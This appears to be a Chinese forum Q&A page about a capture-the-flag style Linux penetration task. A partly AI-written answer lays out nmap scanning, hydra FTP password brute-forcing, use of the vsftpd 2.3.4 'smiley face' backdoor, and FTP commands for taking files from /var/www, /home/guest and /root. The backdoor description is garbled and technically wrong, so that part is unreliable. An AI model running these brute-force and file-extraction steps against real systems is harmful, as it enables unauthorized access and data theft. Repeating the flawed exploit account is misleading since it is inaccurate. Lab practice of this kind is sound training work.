Kanyo236 2025-05-13 16:40 采纳率: 0%
浏览 10

Linux渗透系统测试的解题思路

img

从第二题往后,进行渗透测试的话,用ftp_login直接破解密码好还是直接用ftp笑脸漏洞直接登录提取

  • 写回答

1条回答 默认 最新

  • 宝码香车 优质创作者: JavaScript技术领域 2025-05-13 17:21
    关注

    让【宝码香车】来帮你解答,本回答参考DeepSeek编写,并整理提供。
    如果还有疑问可以点击头像关注私信或评论。如果答案让您满意,请采纳、点赞、关注,非常感谢!

    Linux渗透系统测试解题思路

    1. 端口扫描与服务版本识别

    首先使用nmap进行端口扫描和服务版本识别:

    nmap -sV 靶机IP地址

    在结果中查找21端口对应的服务版本信息字符串作为Flag提交。

    2-9题渗透方法选择

    对于后续题目,需要访问靶机文件系统,有以下两种主要方法:

    方法一:FTP暴力破解(ftp_login)

    hydra -l 用户名 -P 密码字典.txt ftp://靶机IP地址

    优点:

    • 如果成功,可以获得合法凭证
    • 后续操作更稳定

    缺点:

    • 耗时较长
    • 可能触发账户锁定

    方法二:利用FTP笑脸漏洞(CVE-2011-2523)

    ftp 靶机IP地址
用户名: anything)
密码: anything

    优点:

    • 快速直接
    • 不需要破解密码

    缺点:

    • 只适用于特定版本vsftpd(2.3.4)
    • 可能被修补

    建议策略

    1. 首先尝试笑脸漏洞(快速简单):

      ftp 靶机IP地址
# 使用")"作为用户名尝试匿名登录

    2. 如果笑脸漏洞不可用,再尝试暴力破解:

      hydra -L 用户名字典.txt -P 密码字典.txt ftp://靶机IP地址 -t 4

    3. 成功登录后,使用FTP命令获取所需文件:

      ftp> cd /var/www
ftp> ls *.bmp
ftp> get 文件名.bmp

    各题目具体操作

    题目2-3:/var/www目录下的.bmp文件

    ftp> cd /var/www
ftp> ls *.bmp
ftp> get 文件名.bmp
# 然后用图像查看工具或strings命令查看图片内容
strings 文件名.bmp | grep -i flag

    题目4-5:/home/guest目录下的.pdf文件

    ftp> cd /home/guest
ftp> ls *.pdf
ftp> get 文件名.pdf

    题目6-7:/var/vsftpd目录下的.docx文件

    ftp> cd /var/vsftpd
ftp> ls *.docx
ftp> get 文件名.docx

    题目8-9:/root目录下的.txt文件

    ftp> cd /root
ftp> ls *.txt
ftp> get 文件名.txt

    注意:如果无法直接访问/root目录,可能需要先获取root权限。

    评论

报告相同问题?

  • Linux CTF综合漏洞远程渗透题目(解题思路,看下一篇文章)
    2025-09-12 19:35
    黑客影儿的博客 本文介绍了一个Linux CTF二进制渗透测试(PWN)教学程序,该程序集成了栈溢出、堆溢出、格式化字符串、整数溢出和Use-After-Free五大常见漏洞,并新增了TCP远程服务功能(监听7777端口)。文章提供了完整的C语言源码和...
  • 广东省2023技能大赛网络安全赛项 中职 B、C模块的新解题思路
    2024-04-20 13:48
    ### 广东省2023技能大赛网络安全赛项 B/C模块的新解题思路解析 #### B模块解题思路 **B-1 文件包含与目录扫描** 第一小题要求利用文件包含(LFI)和目录扫描技巧来获取信息。具体步骤如下: 1. **文件包含读取:*...
  • 一道中职空间安全SSH弱口令渗透测试解题思路
    2022-06-04 11:55
    shatianyzg的博客 任务环境说明: 服务器场景:Linux 服务器场景操作系统Linux(版本不详) 渗透机场景:BT5 ...1.在本地PC渗透测试平台BT5中使用zenmap工具扫描服务器...通过本地PC中渗透测试平台BT5对服务器场景Linux进行系统
  • Kali Linux渗透测试——WEB渗透(二)
    2021-01-21 11:51
    Captain_RB的博客 Kali Linux渗透测试——WEB渗透(二) 笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程 文章目录Kali Linux渗透测试——WEB渗透(二)漏洞挖掘1.目录遍历/文件包含2.文件上传3.SQL注入4.XSS(Cross-Site...
  • CTF选手必藏的50个实战解题思路
    2025-09-23 17:25
    码农x马马的博客 CTF选手必藏的50个实战解题思路 CTF竞赛的核心逻辑 • 核心目标:快速拆解问题(Flag导向)、工具链协作、模式化思维。 • 关键原则:先广度后深度(优先收集信息)、分治策略(拆解复杂任务)。 第一部分:Web安全...
  • DAY27:主机渗透测试
    2022-08-10 22:03
    EdmunDJK的博客 主机渗透测试、主机渗透常用端口、服务默认端口及爆破使用、主机渗透漏洞实例利用 向日葵rce示例,redis弱口令爆破及getshell
  • 网络渗透测试实验四
    2021-10-19 00:14
    Aurion_的博客 实验目的: 通过对目标靶机的渗透过程,了解...系统环境: Kali Linux 2、WebDeveloper靶机来源:https://www.vulnhub.com/ 实验工具: 基本渗透工具 实验原理: 1、什么是CTF CTF(Capture The Flag)中文一般译作夺
  • Windows系统渗透测试:服务远程控制
    2024-12-06 14:18
    明弟有理想的博客 ,或者直接开启远程桌面连接...很多问题的设置具有迷惑性,同样,相同的题目在不同的攻击机环境下表现出的难度是不一致的,所以更要求选手对各类工具的使用都要有所了解,并且在条件有限的环境下能做出正确的解题技巧。
  • CTF中干扰逆向分析的几种技术的介绍和解题思路
    2020-12-13 22:32
    sherlockjjobs的博客 CTF中干扰逆向分析的几种技术的介绍和解题思路 常见的干扰逆向分析的技术:花指令,反调试,加壳,控制流混淆,双进程保护,虚拟机保护技术 1.花指令 这是一种比较简单的技巧,在原始的代码中插入一段无用的,能够...
  • 网络渗透测试实验四-CTF实践(WebDeveloper靶机渗透
    2020-12-06 20:09
    yatktm的博客 文章目录前言实验目的系统环境实验工具实验原理:1、什么是CTF1.1 CTF竞赛模式(1)解题模式(Jeopardy)(2)攻防模式(Attack-Defense)(3)混合模式(Mix)1.2 CTF各大题型简介MISC(安全杂项)PPC(编程类)CRYPTO...
  • 没有解决我的问题, 去提问

问题事件

  • 创建了问题 5月13日